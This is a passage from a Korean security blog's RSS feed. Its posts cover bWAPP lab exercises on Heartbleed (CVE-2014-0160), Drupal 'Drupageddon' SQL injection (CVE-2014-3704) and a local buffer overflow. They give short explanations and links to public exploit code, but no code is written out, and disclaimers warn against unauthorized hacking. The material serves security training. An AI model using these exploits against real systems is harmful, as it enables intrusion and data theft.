&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;하트블리드(Heartbleed)는&lt;/b&gt; 2014년 4월에 발견된 오픈 소스 암호화 라이브러리인 OpenSSL의 소프트웨어 버그입니다. 발표에 따르면, 인증 기관에서 인증받은 안전한 웹 서버의 약 17%(약 50만대)가 이 공격으로 개인 키 및 세션 쿠키 및 암호를 훔칠 수 있는 상태입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;570&quot; data-origin-height=&quot;156&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wmU8c/btrPuj2YGey/dUTUR7VBDseykqkgAROYV1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wmU8c/btrPuj2YGey/dUTUR7VBDseykqkgAROYV1/img.png&quot; data-alt=&quot;heartbleed.php&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wmU8c/btrPuj2YGey/dUTUR7VBDseykqkgAROYV1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwmU8c%2FbtrPuj2YGey%2FdUTUR7VBDseykqkgAROYV1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;178&quot; data-origin-width=&quot;570&quot; data-origin-height=&quot;156&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;heartbleed.php&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;heartbleed.php 페이지를 살펴 보면 Nginx 웹 서버가 취약한 OpenSSL 버전을 사용하고 있습니다.라는 메시지와 공격 스크립트를 확인할수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1244&quot; data-origin-height=&quot;163&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/JMu2I/btrPt7VPSBu/Kibq90eiL8sucWqPLtknh0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/JMu2I/btrPt7VPSBu/Kibq90eiL8sucWqPLtknh0/img.png&quot; data-alt=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/JMu2I/btrPt7VPSBu/Kibq90eiL8sucWqPLtknh0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJMu2I%2FbtrPt7VPSBu%2FKibq90eiL8sucWqPLtknh0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;98&quot; data-origin-width=&quot;1244&quot; data-origin-height=&quot;163&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;Heartbleed는 CVE-2014-0160으로 명시되어 있습니다. 참고 사이트를 통하여 스크립트 및 자료를 한 번씩 읽어 보시고 실습해보시기 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;참고&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://www.exploit-db.com/exploits/32745&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.exploit-db.com/exploits/32745&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://github.com/sensepost/heartbleed-poc&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://github.com/sensepost/heartbleed-poc&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://heartbleed.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://heartbleed.com/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://blog.alyac.co.kr/76&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://blog.alyac.co.kr/76&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>Code::Security/비박스(BWAPP)</category>
      <category>bWAPP</category>
      <category>CVE-2014-0160</category>
      <category>HeartBleed</category>
      <category>Heartbleed Vulnerability</category>
      <category>비박스</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/251</guid>
      <comments>https://securitycode.tistory.com/251#entry251comment</comments>
      <pubDate>Mon, 24 Oct 2022 16:46:04 +0900</pubDate>
    </item>
    <item>
      <title>비박스(bWAPP) A9 Drupal SQL Injection (Drupageddon)</title>
      <link>https://securitycode.tistory.com/250</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;이&amp;nbsp;도구를&amp;nbsp;이용하여&amp;nbsp;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다. &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;A9 - Drupal SQL Injection (Drupageddon)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;드루팔(Drupal)은&lt;/b&gt; PHP 언어로 개발된 오픈소스 기반의 콘텐츠 관리시스템(CMS)입니다. 워드프레스(WordPress)가 사용자 중심으로 쉽고 편리한 기능을 빠르게 구현하는 것에 중점을 둔 반면, 드루팔은 개발자 중심으로 복잡한 기능을 모두 구현할 수 있다는 특징이 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;714&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/buEoaA/btrPt6vMTbe/5QNC1njZ0K70UAZqbosCKK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/buEoaA/btrPt6vMTbe/5QNC1njZ0K70UAZqbosCKK/img.png&quot; data-alt=&quot;sqli_drupal.php&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/buEoaA/btrPt6vMTbe/5QNC1njZ0K70UAZqbosCKK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbuEoaA%2FbtrPt6vMTbe%2F5QNC1njZ0K70UAZqbosCKK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;158&quot; data-origin-width=&quot;714&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;sqli_drupal.php&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;sqli_drupal.php 페이지를 살펴 보면 특정 버전의 Drupal에서 SQL Injection 공격이 가능하다는 메시지와 CVE가 부여된 취약점 번호가 보이는 것을 확인할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1213&quot; data-origin-height=&quot;198&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bwDOsl/btrPrqhWykF/fVz5khHl5wkh9Q55j7tvVk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bwDOsl/btrPrqhWykF/fVz5khHl5wkh9Q55j7tvVk/img.png&quot; data-alt=&quot;CVE-2014-3704&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bwDOsl/btrPrqhWykF/fVz5khHl5wkh9Q55j7tvVk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbwDOsl%2FbtrPrqhWykF%2FfVz5khHl5wkh9Q55j7tvVk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;122&quot; data-origin-width=&quot;1213&quot; data-origin-height=&quot;198&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;CVE-2014-3704&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;설명&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333;&quot;&gt;Drupal core 7.x 7.32 이전의 데이터베이스 추상화 API에 있는 expandArguments 함수는 준비된 명령문을 제대로 구성하지 않아 원격 공격자가 조작된 키가 포함된 어레이를 통해 SQL 주입 공격을 수행할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333;&quot;&gt;해당 취약점은 Exploit DB에도 명시되어 있으며 참고 사이트를 확인해 보시고 문제를 풀어 보시기 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;span style=&quot;background-color: #ffffff;&quot;&gt;참고&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;span style=&quot;background-color: #ffffff;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://www.exploit-db.com/exploits/35150&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.exploit-db.com/exploits/35150&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://www.exploit-db.com/exploits/34993&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.exploit-db.com/exploits/34993&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://www.exploit-db.com/exploits/34992&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.exploit-db.com/exploits/34992&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://www.exploit-db.com/exploits/34984&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.exploit-db.com/exploits/34984&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::Security/비박스(BWAPP)</category>
      <category>bWAPP</category>
      <category>CVE-2014-3704</category>
      <category>Drupal</category>
      <category>Drupal SQL Injection (Drupageddon)</category>
      <category>sql injection</category>
      <category>비박스</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/250</guid>
      <comments>https://securitycode.tistory.com/250#entry250comment</comments>
      <pubDate>Mon, 24 Oct 2022 16:24:13 +0900</pubDate>
    </item>
    <item>
      <title>비박스(bWAPP) A9 Buffer Overflow (Local)</title>
      <link>https://securitycode.tistory.com/249</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;이&amp;nbsp;도구를&amp;nbsp;이용하여&amp;nbsp;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;A9&amp;nbsp;-&amp;nbsp;Buffer&amp;nbsp;Overflow&amp;nbsp;(Local)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;버퍼&amp;nbsp;오버플로&amp;nbsp;오류는&amp;nbsp;의도적&amp;nbsp;또는&amp;nbsp;비의도적으로&amp;nbsp;수정되어서는&amp;nbsp;안&amp;nbsp;되는&amp;nbsp;프로세스의&amp;nbsp;메모리&amp;nbsp;조각을&amp;nbsp;덮어쓰는&amp;nbsp;것이&amp;nbsp;특징입니다.&amp;nbsp;IP(Instruction&amp;nbsp;Pointer),&amp;nbsp;BP(Base&amp;nbsp;Pointer)&amp;nbsp;및&amp;nbsp;기타&amp;nbsp;레지스터의&amp;nbsp;값을&amp;nbsp;덮어쓰면&amp;nbsp;예외,&amp;nbsp;분할&amp;nbsp;오류&amp;nbsp;및&amp;nbsp;기타&amp;nbsp;오류가&amp;nbsp;발생합니다.&amp;nbsp;일반적으로&amp;nbsp;이러한&amp;nbsp;오류는&amp;nbsp;예기치&amp;nbsp;않은&amp;nbsp;방식으로&amp;nbsp;응용&amp;nbsp;프로그램&amp;nbsp;실행을&amp;nbsp;종료합니다.&amp;nbsp;버퍼&amp;nbsp;오버플로&amp;nbsp;오류는&amp;nbsp;char&amp;nbsp;유형의&amp;nbsp;버퍼에서&amp;nbsp;작업할&amp;nbsp;때&amp;nbsp;발생합니다. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;버퍼&amp;nbsp;오버플로는&amp;nbsp;스택&amp;nbsp;오버플로[스택&amp;nbsp;오버플로]&amp;nbsp;또는&amp;nbsp;힙&amp;nbsp;오버플로[힙&amp;nbsp;오버플로]로&amp;nbsp;구성될&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;이&amp;nbsp;문서에서는&amp;nbsp;혼동을&amp;nbsp;피하기&amp;nbsp;위해&amp;nbsp;이&amp;nbsp;두&amp;nbsp;가지를&amp;nbsp;구분하지&amp;nbsp;않습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;623&quot; data-origin-height=&quot;190&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cVGHdF/btrPfWUwj2L/784jjKRgjmf5t1QWrEwJl0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cVGHdF/btrPfWUwj2L/784jjKRgjmf5t1QWrEwJl0/img.png&quot; data-alt=&quot;bof_1.php&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cVGHdF/btrPfWUwj2L/784jjKRgjmf5t1QWrEwJl0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcVGHdF%2FbtrPfWUwj2L%2F784jjKRgjmf5t1QWrEwJl0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;229&quot; data-origin-width=&quot;623&quot; data-origin-height=&quot;190&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bof_1.php&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;513&quot; data-origin-height=&quot;345&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b1RVO6/btrPfDHLSPO/uLWUBleuqLLnf1tkauoF61/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b1RVO6/btrPfDHLSPO/uLWUBleuqLLnf1tkauoF61/img.png&quot; data-alt=&quot;bof_1.php 소스코드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b1RVO6/btrPfDHLSPO/uLWUBleuqLLnf1tkauoF61/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb1RVO6%2FbtrPfDHLSPO%2FuLWUBleuqLLnf1tkauoF61%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;437&quot; data-origin-width=&quot;513&quot; data-origin-height=&quot;345&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bof_1.php 소스코드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;bof_1.php 메인 페이지와 소스코드를 살펴보면 메인 페이지에서는 힌트를 제공하고 소스 코드에서는 shell_exe를 통하여 쉘 명령을 실행한다는 것을 알 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;먼저 해당 문제를 풀기 위해서는 컴파일, 디버깅을 통한 메모리 분석, 쉘코드 작성을 통한 공격코드 삽입이 이루어져야 하며 여기서는 BOF(Buffer Overflow)가 무엇이고 어떻게 공격이 이루어지는지 참고에 있는 OWSAP 문서를 통하여 확인해 보시기 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;해당 BOF에 관한 문제는 추후 어떻게 컴파일이 이루어 지고 디버깅을 어떻게 하는지 유닉스, 윈도를 나눠서 다룰 예정이며 쉘 코드 작성 방법과 어떤 툴들을 사용하는지 다룰 예정입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;참고&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://owasp.org/www-community/attacks/Buffer_overflow_attack&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://owasp.org/www-community/attacks/Buffer_overflow_attack&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13.2-Testing_for_Stack_Overflow&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13.2-Testing_for_Stack_Overflow&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://owasp.org/www-community/vulnerabilities/Buffer_Overflow&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://owasp.org/www-community/vulnerabilities/Buffer_Overflow&lt;/a&gt;&lt;/p&gt;</description>
      <category>Code::Security/비박스(BWAPP)</category>
      <category>Buffer Overflow</category>
      <category>Buffer Overflow (Local)</category>
      <category>bWAPP</category>
      <category>OWASP</category>
      <category>비박스</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/249</guid>
      <comments>https://securitycode.tistory.com/249#entry249comment</comments>
      <pubDate>Fri, 21 Oct 2022 17:12:59 +0900</pubDate>
    </item>
  </channel>
</rss>